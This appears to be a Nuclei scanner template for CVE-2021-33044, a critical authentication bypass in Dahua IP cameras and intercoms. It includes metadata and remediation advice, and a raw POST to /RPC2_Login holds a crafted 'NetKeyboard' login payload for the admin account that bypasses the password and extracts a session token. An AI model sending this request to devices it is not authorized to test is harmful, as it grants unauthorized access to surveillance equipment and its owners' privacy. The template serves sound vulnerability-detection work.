id: CVE-2021-33044

info:
  name: Dahua IPC/VTH/VTO - Authentication Bypass
  author: gy741
  severity: critical
  description: Some Dahua products contain an authentication bypass during the login process. Attackers can bypass device identity authentication by constructing malicious data packets.
  impact: |
    An attacker can gain unauthorized access to the device, potentially compromising the security and privacy of the system.
  remediation: |
    Apply the latest firmware update provided by Dahua to fix the authentication bypass vulnerability.
  reference:
    - https://github.com/dorkerdevil/CVE-2021-33044
    - https://nvd.nist.gov/vuln/detail/CVE-2021-33044
    - https://seclists.org/fulldisclosure/2021/Oct/13
    - https://www.dahuasecurity.com/support/cybersecurity/details/957
    - https://github.com/bp2008/DahuaLoginBypass
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2021-33044
    cwe-id: CWE-287
    epss-score: 0.30359
    epss-percentile: 0.96948
    cpe: cpe:2.3:o:dahuasecurity:ipc-hum7xxx_firmware:*:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: dahuasecurity
    product: ipc-hum7xxx_firmware
  tags: cve2021,cve,dahua,auth-bypass,seclists,dahuasecurity

http:
  - raw:
      - |
        POST /RPC2_Login HTTP/1.1
        Host: {{Hostname}}
        Accept: application/json, text/javascript, */*; q=0.01
        Connection: close
        X-Requested-With: XMLHttpRequest
        Content-Type: application/x-www-form-urlencoded; charset=UTF-8
        Origin: {{BaseURL}}
        Referer: {{BaseURL}}

        {"id": 1, "method": "global.login", "params": {"authorityType": "Default", "clientType": "NetKeyboard", "loginType": "Direct", "password": "Not Used", "passwordType": "Default", "userName": "admin"}, "session": 0}

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - '"result":true'
          - 'id'
          - 'params'
          - 'session'
        condition: and

      - type: status
        status:
          - 200

    extractors:
      - type: regex
        group: 1
        regex:
          - ',"result":true,"session":"([a-z]+)"\}'
        part: body
# digest: 4a0a00473045022100e0608c5537bcf8b5dfaa512dd8755999f45853416be5f28fd5fe3d69d1cb0cdb02203c35616fdd4645b3cfabbc72041a76cd8838bfa9e167a07faf46f814791d4a20:922c64590222798bb761d5b6d8e72950